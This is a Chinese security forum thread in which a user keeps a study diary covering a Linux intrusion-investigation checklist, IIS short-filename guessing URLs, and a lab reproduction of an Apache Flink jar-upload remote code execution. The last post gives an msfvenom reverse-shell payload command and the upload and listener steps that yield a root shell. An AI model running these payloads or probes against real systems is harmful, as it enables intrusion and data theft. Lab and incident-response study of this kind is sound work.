安全矩阵

 找回密码
 立即注册
搜索
12
返回列表 发新帖
楼主: 岑云木

岑云木学习日记

[复制链接]

1

主题

12

帖子

57

积分

注册会员

Rank: 2

积分
57
 楼主| 发表于 2021-3-21 23:17:12 | 显示全部楼层
文件分析-敏感文件信息
  在linux系统下一切都是文件。其中/tmp是一个特别的临时文件。每个用户都可以对他进行操作。因此一个普通用户可以对/tmp目录执行读写操作。 ls -alt /
文件分析-敏感文件信息
查看开机启动项内容 /etc/init.d/,恶意代码很有可能设置在开机自启动的位置。
  查看指定目录下文件时间顺序的排序:ls -alt | head -n 10
  查看文件时间属性 : stat 文件名
文件分析-敏感文件信息
新增文件分析:
查找24小时内被修改的文件
find ./ -mtime 0 -name "*.php"
查找72小时内新增的文件
find ./-crtime -2 name "*.php"
权限查找:在linux系统中,如果具有777权限,那么文件很有可疑。
find./-iname ".php" -perm 777 其中 -iname忽略大小写,-perm用于 设定筛选文件权限
进程分析-网络连接分析
在linux中可以使用netstat 进行网络连接查看
netstat -Print network connections ,routing tables,interface statistics,masquerade connections,and multicast memberships
若想查看具体参数可参照 man netstat
常用命令netstat -pantl 查看处于tcp网络套接字相关信息。
关闭未知连接 kill -9 pid即可关闭
进程分析-进程所对文件
在linux可以使用ps查看进程相关信息。
使用ps aux查看 所有进程信息
使用ps aux|grep PID 筛选具体PID的进程信息,losf -i:端口号 也可以实现类似功能
登陆分析
在linux做的操作都会被记录到系统日志中,对于登录也可以查看日志信息查看是否有异常登录。
last 命令last -i| grep -v 0.0.0.0 查看登陆日志,筛选非本地登录
w命令 实时登录查看
异常用户分析排查
在linux 中 root用户是一个无敌的存在,可以在linux上做任何事情。
新建用户 useradd username
设置密码 passwd username输出密码
设置用户 uid 和gid都为0.(root用户的uid为0 gid为0)
cat /etc/passwd
grep "0:0"/etc/passwd
ls -l /etc/passwd
awk -F:'$3==0 {print $1}'/etc/passwd
awk -F:'$2=="!"{print $1}'/etc/shadow 或awk -F:'length($2)==0{print $1}'/etc/shadow
历史命令分析history
在linux系统中默认会记录之前执行的命令 /root/.bash_history文件中。用户可以使用cat /root/.bash_history进行查看或者使用history命令查看
pay attention:wegt(可能远程下载木马)、SSH(连接内网主机)、tar zip类命令(数据打包)、系统配置等(命令修改)
计划任务排查crontab
在Linux系统中使用命令crontab进行计划任务的设定
其中-e可以用来编辑设定计划任务,-l可以用来查看当前计划任务,-d用来删除计划任务。
特别注意计划任务中未知内容
开机启动项
在linux(Debian)系统中 /etc/init.d/目录下保存着 开机自启动程序的目录
用户可以直接使用 /etc/init.d/程序名称 status 查看状态
使用update-rc.d程序名称 disable取消开启自启动 enable打开开机启动
$path 变量异常
后门排查 -rkhunter
rkhunker具有以下功能:
1.系统命令检测,MD5校验
2、ROOkit检测
3.本机敏感目录、系统配置异常检测
rkhunker -check -sk   -c,--check(check the local system)
--sk,--skip -keypress  don't wait for a keypress after each test
回复

使用道具 举报

1

主题

12

帖子

57

积分

注册会员

Rank: 2

积分
57
 楼主| 发表于 2021-3-31 23:48:23 | 显示全部楼层
本帖最后由 岑云木 于 2021-3-31 23:49 编辑

目标页面存在iis短文件名泄露漏洞 ,可通过手工猜解和工具猜解,可直接猜解后台地址,猜解敏感文件,例如备份的rar、zip、.bak、.SQL文件等。在某些情形下,甚至可以通过短文件名web直接下载对应的文件。比如下载备份SQL文件。
猜解出的文件目录,可直接访问
可构造类似如下payload:

http://www.xxx.com/*~1****/a.aspx、  http://www.xxx.com/1234*~1****/a.aspx

依次猜解文件名(文件名存在会返回404页面,不存在会提示提示错误页面)

猜解出来的目录可直接进行访问,可猜解后台地址, 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等,甚至可以通过短文件名web直接下载对应的文件。
C:\Users\Ricardo\Desktop\1.png

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

1

主题

12

帖子

57

积分

注册会员

Rank: 2

积分
57
 楼主| 发表于 前天 19:47 | 显示全部楼层
本帖最后由 岑云木 于 2021-4-13 19:50 编辑

Apache Flink任意Jar包上传致RCE 漏洞-技术漏洞复现

一.        环境搭建
1.        需要java8环境
2.        安装flink,下载地址:https://archive.apache.org/dist/ ... -bin-scala_2.11.tgz
3.        在此使用kali搭建flink也作为攻击机,使用tar -zxvf flink-1.9.1-bin-scala_2.11.tgz

解压缩后cd进入flink-1.9.1/bin目录 ,运行./start-cluster.sh

二.设置攻击载荷
回到msfvenom设置载荷:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4445 -f jar >shell.jar

三.设置监听
在msfconsole中设置监听和payload,设置地址为主机地址(公网vps地址),设置端口为4445(任意)


浏览器中输入:127.0.0.1:8081进入flink平台,上传且submit攻击载荷shell.jar

点击提交后在msfconsole获取回弹信息,输入whoami确认获取到root权限


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2021-4-15 21:16 , Processed in 0.010492 second(s), 17 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表